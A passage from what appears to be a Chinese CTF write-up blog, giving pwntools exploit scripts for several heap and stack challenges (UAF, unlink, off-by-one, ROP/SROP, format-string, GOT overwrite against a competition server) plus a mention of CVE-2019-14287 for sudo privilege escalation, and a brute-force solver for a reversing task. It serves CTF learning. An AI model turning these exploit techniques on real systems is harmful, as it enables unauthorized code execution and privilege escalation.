class="string">&quot;A&quot;</span>)</span><br><span class="line">step1(<span class="string">&quot;A&quot;</span>*<span class="number">0x90</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">##=== second part</span></span><br><span class="line"></span><br><span class="line">four_code(<span class="number">1</span>,<span class="number">1</span>,<span class="number">2</span>,<span class="number">1</span>)</span><br><span class="line">step1(<span class="string">&quot;a&quot;</span>*<span class="number">0x28</span>)</span><br><span class="line">p.recvuntil(<span class="string">&quot;a&quot;</span>*<span class="number">0x28</span>)</span><br><span class="line">stack = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">&quot;\x00&quot;</span>))-<span class="number">0xd0</span></span><br><span class="line">info(<span class="string">&quot;stack ===&gt; 0x%x&quot;</span>,stack)</span><br><span class="line"></span><br><span class="line">target = <span class="number">0x400C77</span></span><br><span class="line">step1(<span class="string">&quot;a&quot;</span>*<span class="number">12</span>+p64(elf.got[<span class="string">&quot;atoi&quot;</span>]))</span><br><span class="line">step2(libc.sym[<span class="string">&quot;printf&quot;</span>],<span class="string">&quot;a&quot;</span>)</span><br><span class="line"></span><br><span class="line">rop = ROP(libc)</span><br><span class="line">rop.base = stack</span><br><span class="line">rop.<span class="built_in">open</span>(<span class="string">&quot;flag&quot;</span>,<span class="number">0</span>,<span class="number">0</span>)</span><br><span class="line">rop.read(<span class="number">3</span>,stack-<span class="number">0x200</span>,<span class="number">0x30</span>)</span><br><span class="line">rop.puts(stack-<span class="number">0x200</span>)</span><br><span class="line"><span class="built_in">print</span> rop.dump()</span><br><span class="line">payload = rop.chain()</span><br><span class="line">info(<span class="string">&quot;payload len : 0x%x&quot;</span>,<span class="built_in">len</span>(payload)) <span class="comment">#0x80</span></span><br><span class="line"></span><br><span class="line">step1(payload+p64(stack-<span class="number">0x8</span>)+p64(stack-<span class="number">0x6</span>))</span><br><span class="line"><span class="comment">#debug()</span></span><br><span class="line"><span class="comment">#=== third part format!!</span></span><br><span class="line"><span class="comment">#ret = 0x400901</span></span><br><span class="line"></span><br><span class="line">p.sendline(<span class="string">&quot;%&quot;</span>+<span class="built_in">str</span>(<span class="number">0x40</span>)+<span class="string">&quot;c%35$hn&quot;</span>)</span><br><span class="line">p.sendline(<span class="string">&quot;%&quot;</span>+<span class="built_in">str</span>(<span class="number">0x901</span>)+<span class="string">&quot;c%34$hn&quot;</span>)</span><br><span class="line">p.sendline(<span class="string">&quot;66666&quot;</span>)</span><br><span class="line">p.sendline(<span class="string">&quot;66666&quot;</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<p>感觉做法偏复杂了，应该还有更简单的做法，到时候再复现复现。</p>
<h1 id="vtcpp"><a href="#vtcpp" class="headerlink" title="vtcpp"></a>vtcpp</h1><p>有seccomp，禁了execve和open，但open可以用openat代替。没开PIE。</p>
<p>delete的时候有uaf，可以用4选项add相应大小的堆块修改其内容。逆出结构体后把存字符串的指针覆盖成elf.got[“puts”]可以泄露出libc信息。</p>
<p>结构体第一位存了函数指针，把指针覆盖到setcontext+53，把栈迁移到message处，同样往message处放rop链。最后解决seccontext中rdi+0xa8的地址无法控制的问题。可以用4操作多申请几个堆块，把bin里的堆块都申请完，之后再申请的堆都会在距离top chunk最近的地方被申请，在那里申请一个新结构体，再申请一块任意长的内容写入srop，把rsp设置为message起始地址，rip设置为ret的地址。最后orw读取flag。</p>
<p>远程打不通，太离谱了。libc可以正常泄露，库版本也没问题，而且在wsl和ubuntu虚拟机都试了，还让同学用它的kali跑也跑通了，但就是打不通远程。原来是glibc里setcontext的寄存器指针被换了，汗。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#context.log_level = &quot;debug&quot;</span></span><br><span class="line">context.arch = <span class="string">&quot;amd64&quot;</span></span><br><span class="line">context.terminal = [<span class="string">&quot;open-wsl.exe&quot;</span>,<span class="string">&quot;-c&quot;</span>]</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">debug</span>(<span class="params">s=[]</span>):</span></span><br><span class="line">    s.append(<span class="string">&quot;set $m=0x603360&quot;</span>)</span><br><span class="line">    s.append(<span class="string">&quot;b *0x40180F&quot;</span>) <span class="comment">#call</span></span><br><span class="line">    <span class="comment">#s.append(&quot;b *0x401743&quot;) #</span></span><br><span class="line">    <span class="comment">#s.append(&quot;b *0x401764&quot;) #node init</span></span><br><span class="line">    gdb.attach(p,<span class="string">&quot;\n&quot;</span>.join(s))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">name,age,message</span>):</span></span><br><span class="line">    p.sendlineafter(<span class="string">&quot;&gt;&quot;</span>,<span class="string">&quot;1&quot;</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;name:&quot;</span>,name)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;age&quot;</span>,<span class="built_in">str</span>(age))</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;message&quot;</span>,message)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span>():</span></span><br><span class="line">    p.sendlineafter(<span class="string">&quot;&gt;&quot;</span>,<span class="string">&quot;2&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>():</span></span><br><span class="line">    p.sendlineafter(<span class="string">&quot;&gt;&quot;</span>,<span class="string">&quot;3&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">note</span>(<span class="params">size,content</span>):</span></span><br><span class="line">    p.sendlineafter(<span class="string">&quot;&gt;&quot;</span>,<span class="string">&quot;4&quot;</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;size:&quot;</span>,<span class="built_in">str</span>(size))</span><br><span class="line">    p.sendafter(<span class="string">&quot;content:&quot;</span>,content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">orw</span>(<span class="params">rop_address,store</span>):</span></span><br><span class="line">    rop = ROP(libc)</span><br><span class="line">    rop.base=rop_address    </span><br><span class="line">    rop.openat(<span class="number">0</span>,<span class="string">&quot;/flag&quot;</span>,<span class="number">0</span>,<span class="number">0</span>)</span><br><span class="line">    rop.read(<span class="number">3</span>,store,<span class="number">0x30</span>)</span><br><span class="line">    rop.puts(store)</span><br><span class="line">    payload = rop.chain()</span><br><span class="line">    <span class="keyword">return</span> payload</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">test</span>(<span class="params">rop_address,store</span>):</span></span><br><span class="line">    rop = ROP(libc)</span><br><span class="line">    rop.base=rop_address    </span><br><span class="line">    rop.read(<span class="number">0</span>,rop_address+<span class="number">0x200</span>,<span class="number">0x10</span>)</span><br><span class="line">    rop.write(<span class="number">1</span>,rop_address+<span class="number">0x200</span>,<span class="number">0x10</span>)</span><br><span class="line">    payload = rop.chain()</span><br><span class="line">    <span class="keyword">return</span> payload</span><br><span class="line"></span><br><span class="line">file = <span class="string">&quot;./vtcpp&quot;</span></span><br><span class="line">elf = ELF(file)</span><br><span class="line">libc = ELF(<span class="string">&quot;./libc-2.23.so&quot;</span>)</span><br><span class="line"></span><br><span class="line">local=<span class="number">0</span></span><br><span class="line"><span class="keyword">if</span> local:</span><br><span class="line">    p = process(file)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    p = remote(<span class="string">&quot;183.129.189.60&quot;</span>,<span class="number">10000</span>)</span><br><span class="line"></span><br><span class="line">p_id = <span class="number">0x401D98</span></span><br><span class="line">rop_address = <span class="number">0x603360</span></span><br><span class="line"></span><br><span class="line">add(<span class="string">&quot;a&quot;</span>,<span class="number">0</span>,<span class="string">&quot;GG!&quot;</span>)</span><br><span class="line">delete()</span><br><span class="line">note(<span class="number">0x38</span>,p64(p_id)+p64(<span class="number">666</span>)+p64(elf.got[<span class="string">&quot;puts&quot;</span>])+p64(<span class="number">8</span>)+p64(<span class="number">0x20</span>)+p64(<span class="number">0</span>)+p64(<span class="number">666</span>)) </span><br><span class="line">show()</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">&quot;name :&quot;</span>)</span><br><span class="line">puts_addr = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">&quot;\x00&quot;</span>))</span><br><span class="line">libc.address = puts_addr - libc.sym[<span class="string">&quot;puts&quot;</span>]</span><br><span class="line"></span><br><span class="line"><span class="comment">#debug()</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10</span>):</span><br><span class="line">    note(<span class="number">0x38</span>,<span class="string">&quot;hhhh&quot;</span>)</span><br><span class="line"></span><br><span class="line">payload = orw(rop_address,rop_address+<span class="number">0x200</span>)</span><br><span class="line"><span class="comment">#payload = orw(rop_address,rop_address+0xb0)</span></span><br><span class="line"><span class="comment">#len(payload) = 0x90</span></span><br><span class="line"></span><br><span class="line">payload = payload.ljust(<span class="number">0x200</span>,<span class="string">&quot;a&quot;</span>)</span><br><span class="line">payload += p64(libc.sym[<span class="string">&quot;setcontext&quot;</span>]+<span class="number">53</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="string">&quot;a&quot;</span>,<span class="number">0</span>,payload) <span class="comment">#latest chunk</span></span><br><span class="line"></span><br><span class="line">delete()</span><br><span class="line"></span><br><span class="line">info(<span class="string">&quot;puts ===&gt; 0x%x&quot;</span>,puts_addr)</span><br><span class="line">info(<span class="string">&quot;libc ===&gt; 0x%x&quot;</span>,libc.address)</span><br><span class="line">info(<span class="string">&quot;setcontext ===&gt; 0x%x&quot;</span>,libc.sym[<span class="string">&quot;setcontext&quot;</span>])</span><br><span class="line"></span><br><span class="line">note(<span class="number">0x38</span>,p64(rop_address+<span class="number">0x200</span>)*<span class="number">4</span>)</span><br><span class="line"><span class="comment">#note(0x38,p64(p_id)+p64(666)+p64(rop_address)+p64(0x30)+p64(0x40)+p64(0)+p64(666))</span></span><br><span class="line">ret = libc.address + <span class="number">0x937</span></span><br><span class="line">note(<span class="number">0x300</span>,<span class="number">13</span>*p64(rop_address)+p64(elf.plt[<span class="string">&quot;puts&quot;</span>])*<span class="number">10</span>)</span><br><span class="line">show()</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>


<h1 id="undlcv"><a href="#undlcv" class="headerlink" title="undlcv"></a>undlcv</h1><p>没开pie，got可写，只能orw。</p>
<p>只能操作两个堆块</p>
<ol>
<li>add可以让我们选操作哪一个，大小固定0xf8</li>
<li>edit有off-by-one漏洞</li>
<li>delete无uaf</li>
<li>backdoor可以malloc一个0x18的小堆块，令free的got表指向这个堆块。free必须未绑定才能生效，说明要早一点用。</li>
</ol>
<p>先看看能不能确定大致版本，用off-by-one触发unlink，不报错则可以确定有tcache。按如下手法操作连接会中断，说明没有tcache。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="number">0</span>)</span><br><span class="line">add(<span class="number">1</span>)</span><br><span class="line">edit(<span class="number">0</span>,<span class="string">&quot;a&quot;</span>*<span class="number">0xf8</span>)</span><br><span class="line">delete(<span class="number">1</span>)</span><br></pre></td></tr></table></figure>
<p>按如下手法操作，可以得到报错信息：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">add(0)</span><br><span class="line">add(1)</span><br><span class="line">edit(0,&quot;a&quot;*0xf8)</span><br><span class="line">delete(0)</span><br></pre></td></tr></table></figure>
<p>错误信息：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">[DEBUG] Received 0x53 bytes:</span><br><span class="line">    &quot;*** Error in `./undlcv&#x27;: double free or corruption (!prev): 0x0000000001c14010 ***\n&quot;</span><br><span class="line">*** Error in `./undlcv&#x27;: double free or corruption (!prev): 0x0000000001c14010 ***</span><br><span class="line">[DEBUG] Received 0x16b bytes:</span><br><span class="line">    &#x27;======= Backtrace: =========\n&#x27;</span><br><span class="line">    &#x27;/lib/x86_64-linux-gnu/libc.so.6(+0x777f5)[0x7f83459857f5]\n&#x27;</span><br><span class="line">    &#x27;/lib/x86_64-linux-gnu/libc.so.6(+0x8038a)[0x7f834598e38a]\n&#x27;</span><br><span class="line">    &#x27;/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f834599258c]\n&#x27;</span><br><span class="line">    &#x27;./undlcv[0x401461]\n&#x27;</span><br><span class="line">    &#x27;./undlcv[0x40158c]\n&#x27;</span><br><span class="line">    &#x27;/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f834592e840]\n&#x27;</span><br><span class="line">    &#x27;./undlcv[0x40113e]\n&#x27;</span><br><span class="line">    &#x27;======= Memory map: ========\n&#x27;</span><br><span class="line">======= Backtrace: =========</span><br><span class="line">/lib/x86_64-linux-gnu/libc.so.6(+0x777f5)[0x7f83459857f5]</span><br><span class="line">/lib/x86_64-linux-gnu/libc.so.6(+0x8038a)[0x7f834598e38a]</span><br><span class="line">/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f834599258c]</span><br><span class="line">./undlcv[0x401461]</span><br><span class="line">./undlcv[0x40158c]</span><br><span class="line">/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f834592e840]</span><br><span class="line">./undlcv[0x40113e]</span><br><span class="line">======= Memory map: ========</span><br><span class="line">[*] Got EOF while reading in interactive</span><br></pre></td></tr></table></figure>
<p>非常幸运，从函数的调用栈中发现有用的信息：<code>&#39;/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f834592e840]\n&#39;            </code></p>
<p>用libc-database查出库版本：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">root@pwn:~/libc-database# ./find __libc_start_main 750</span><br><span class="line">ubuntu-glibc (libc6_2.23-0ubuntu11.2_amd64)</span><br></pre></td></tr></table></figure>
<p>另外backdoor中关于extern段的解释：<a target="_blank" rel="noopener" href="https://stackoverflow.com/questions/37638506/what-does-segment-type-externs-mean-in-ida">https://stackoverflow.com/questions/37638506/what-does-segment-type-externs-mean-in-ida</a></p>
<blockquote>
<p><code>extern</code> is not a real segment. It is a pseudo segment created by IDA to represent symbols with unknown addresses in other modules; the GOT usually contains pointers to those. During debugging it probably gets covered by .bss or stack area cleared by the OS loader, that’s why you see zeroes there.</p>
</blockquote>
<p>直接unlink，改read的got为one_gadget</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#context.log_level = &quot;debug&quot;</span></span><br><span class="line">context.arch = <span class="string">&quot;amd64&quot;</span></span><br><span class="line">context.terminal = [<span class="string">&quot;open-wsl.exe&quot;</span>,<span class="string">&quot;-c&quot;</span>]</span><br><span class="line"><span class="comment">#context.aslr = False</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">debug</span>(<span class="params">s=[]</span>):</span></span><br><span class="line">    s.append(<span class="string">&quot;define h&quot;</span>)</span><br><span class="line">    s.append(<span class="string">&quot;x/4gx 0x403480&quot;</span>)</span><br><span class="line">    s.append(<span class="string">&quot;end&quot;</span>)</span><br><span class="line"></span><br><span class="line">    s.append(<span class="string">&quot;set $f=0x403418&quot;</span>)</span><br><span class="line">    gdb.attach(p,<span class="string">&quot;\n&quot;</span>.join(s))</span><br><span class="line">    </span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">idx</span>):</span></span><br><span class="line">    p.send(<span class="string">&quot;1&quot;</span>.ljust(<span class="number">10</span>,<span class="string">&quot;\x00&quot;</span>))</span><br><span class="line">    p.send(<span class="built_in">str</span>(idx).ljust(<span class="number">10</span>,<span class="string">&quot;\x00&quot;</span>)) <span class="comment">#read(0, nptr, 10uLL)</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span>(<span class="params">idx</span>):</span></span><br><span class="line">    p.send(<span class="string">&quot;3&quot;</span>.ljust(<span class="number">10</span>,<span class="string">&quot;\x00&quot;</span>))</span><br><span class="line">    p.send(<span class="built_in">str</span>(idx).ljust(<span class="number">10</span>,<span class="string">&quot;\x00&quot;</span>))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">idx,content</span>):</span></span><br><span class="line">    p.send(<span class="string">&quot;2&quot;</span>.ljust(<span class="number">10</span>,<span class="string">&quot;\x00&quot;</span>))</span><br><span class="line">    p.send(<span class="built_in">str</span>(idx).ljust(<span class="number">10</span>,<span class="string">&quot;\x00&quot;</span>))</span><br><span class="line">    p.send(content)</span><br><span class="line">    sleep(<span class="number">0.4</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">backdoor</span>():</span></span><br><span class="line">    p.send(<span class="string">&quot;4&quot;</span>.ljust(<span class="number">10</span>,<span class="string">&quot;\x00&quot;</span>))</span><br><span class="line"></span><br><span class="line">file = <span class="string">&quot;./undlcv&quot;</span></span><br><span class="line">elf = ELF(file)</span><br><span class="line">local=<span class="number">0</span></span><br><span class="line">i=<span class="number">0</span></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        info(<span class="string">&quot;i =======&gt; %d&quot;</span>,i)</span><br><span class="line">        i+=<span class="number">1</span></span><br><span class="line">        <span class="keyword">if</span> local:</span><br><span class="line">            p = process(file)</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            p = remote(<span class="string">&quot;183.129.189.60&quot;</span>,<span class="number">10013</span>)</span><br><span class="line">        P = <span class="number">0x403480</span></span><br><span class="line">        add(<span class="number">0</span>)</span><br><span class="line">        add(<span class="number">1</span>)</span><br><span class="line">        backdoor()</span><br><span class="line"></span><br><span class="line">        <span class="comment">#unlink</span></span><br><span class="line">        <span class="comment">#fake size 0xf0</span></span><br><span class="line">        edit(<span class="number">0</span>,p64(<span class="number">0</span>)+p64(<span class="number">0xf0</span>)+p64(P-<span class="number">0x18</span>)+p64(P-<span class="number">0x10</span>)+<span class="string">&quot;a&quot;</span>*<span class="number">0xd0</span>+p64(<span class="number">0xf0</span>))</span><br><span class="line">        delete(<span class="number">1</span>)</span><br><span class="line">        edit(<span class="number">0</span>,p64(<span class="number">0</span>)*<span class="number">3</span>+p64(P)+p64(elf.got[<span class="string">&quot;read&quot;</span>]))</span><br><span class="line">        <span class="comment">#debug()</span></span><br><span class="line">        edit(<span class="number">1</span>,p16(<span class="number">0x1207</span>))</span><br><span class="line">        p.sendline(<span class="string">&quot;echo aaaaaaaaaaa&quot;</span>)</span><br><span class="line">        a=p.recvline(timeout=<span class="number">0.5</span>)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;aaaaa&quot;</span> <span class="keyword">in</span> a:</span><br><span class="line">            <span class="built_in">print</span> <span class="string">&quot;success!&quot;</span></span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">        p.close()</span><br><span class="line">    <span class="keyword">except</span>:</span><br><span class="line">        p.close()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<p>打通远程后，本以为要成功了，结果没权限读flag，后来发现可以用CVE-2019-14287提权。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">-r--------  1 root root    41 Jan 18 10:27 flag</span><br><span class="line"></span><br><span class="line"><span class="meta">$</span><span class="bash"> cat flag</span></span><br><span class="line">cat: flag: Permission denied</span><br><span class="line"><span class="meta">$</span><span class="bash"> sudo cat flag</span></span><br><span class="line"></span><br><span class="line">We trust you have received the usual lecture from the local System</span><br><span class="line">Administrator. It usually boils down to these three things:</span><br><span class="line"></span><br><span class="line">    #1) Respect the privacy of others.</span><br><span class="line">    #2) Think before you type.</span><br><span class="line">    #3) With great power comes great responsibility.</span><br><span class="line"></span><br><span class="line">sudo: no tty present and no askpass program specified</span><br></pre></td></tr></table></figure>


<h1 id="encryption"><a href="#encryption" class="headerlink" title="encryption"></a>encryption</h1><p>发现是加密是线性的，直接爆破出来了。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">box=[<span class="number">18</span>,  <span class="number">69</span>,  <span class="number">16</span>,  <span class="number">71</span>,  <span class="number">25</span>,  <span class="number">73</span>,  <span class="number">73</span>,  <span class="number">73</span>,  <span class="number">26</span>,  <span class="number">79</span>, <span class="number">28</span>,  <span class="number">30</span>,  \</span><br><span class="line">	<span class="number">82</span>, <span class="number">102</span>,  <span class="number">29</span>,  <span class="number">82</span>, <span class="number">102</span>, <span class="number">103</span>, <span class="number">104</span>, <span class="number">103</span>, <span class="number">101</span>, <span class="number">111</span>,  <span class="number">95</span>,  <span class="number">89</span>,  <span class="number">88</span>, \</span><br><span class="line">    <span class="number">94</span>, <span class="number">109</span>, <span class="number">112</span>, <span class="number">161</span>, <span class="number">110</span>, <span class="number">112</span>, <span class="number">163</span>]</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">enc</span>(<span class="params">Input</span>):</span></span><br><span class="line">    Output=[]</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">32</span>):</span><br><span class="line">        In=Input[i]</span><br><span class="line">        cnt=i</span><br><span class="line">        </span><br><span class="line">        v3 = <span class="number">2</span>*(cnt&amp;In)</span><br><span class="line">        In ^= cnt</span><br><span class="line">        cnt = v3</span><br><span class="line"></span><br><span class="line">        <span class="keyword">while</span>(v3):</span><br><span class="line">            v3 = <span class="number">2</span>*(cnt&amp;In)</span><br><span class="line">            In ^= cnt</span><br><span class="line">            cnt = v3  </span><br><span class="line">        Output.append(In^<span class="number">0x23</span>)</span><br><span class="line">    <span class="keyword">return</span> Output</span><br><span class="line"></span><br><span class="line">Input=[<span class="number">69</span>, <span class="number">60</span>, <span class="number">64</span>, <span class="number">71</span>, <span class="number">70</span>, <span class="number">69</span>, <span class="number">68</span>, <span class="number">66</span>, <span class="number">74</span>, <span class="number">73</span>, <span class="number">72</span>, <span class="number">79</span>, <span class="number">78</span>, <span class="number">77</span>, <span class="number">76</span>, <span class="number">83</span>,\</span><br><span class="line">       <span class="number">82</span>, <span class="number">81</span>, <span class="number">80</span>, <span class="number">87</span>, <span class="number">86</span>, <span class="number">85</span>, <span class="number">84</span>, <span class="number">91</span>,\</span><br><span class="line">       <span class="number">90</span>, <span class="number">89</span>, <span class="number">88</span>, <span class="number">95</span>, <span class="number">94</span>, <span class="number">93</span>, <span class="number">92</span>, <span class="number">163</span>]</span><br><span class="line"></span><br><span class="line"><span class="comment">#print(enc(Input))</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">32</span>):</span><br><span class="line">    Input[i]=<span class="number">0x21</span></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        <span class="keyword">if</span>(enc(Input)[i]==box[i]):</span><br><span class="line">            print(Input)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">        Input[i]+=<span class="number">1</span></span><br><span class="line">        </span><br><span class="line">flag=<span class="string">&quot;&quot;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> Input:</span><br><span class="line">    flag+=<span class="built_in">chr</span>(i)</span><br></pre></td></tr></table></figure>

    </div>
    <!--文末结束语-->
    
        <div style="text-align:center;color: #ccc;font-size:14px;"> --- 本文结束 <i class="fas fa-heart"></i> The End --- </div>
    
    <!--页脚广告-->
    
    <v-divider></v-divider>
    
    <div class="post-nav">             
        
            <div class="post-nav-button float-left">
                <v-icon>chevron_left</v-icon>
                <a class="font-weight-bold text-left" href="/2021/02/06/Game/DiceCTF/">
                    
                </a>
            </div>
              
          
            <div class="post-nav-button float-right">
                <a class="font-weight-bold text-right" href="/2021/01/24/Classic/applestore/">      
                    applestore
                </a>
                <v-icon>chevron_right</v-icon>
            </div>
        
    </div>
</v-card>



        
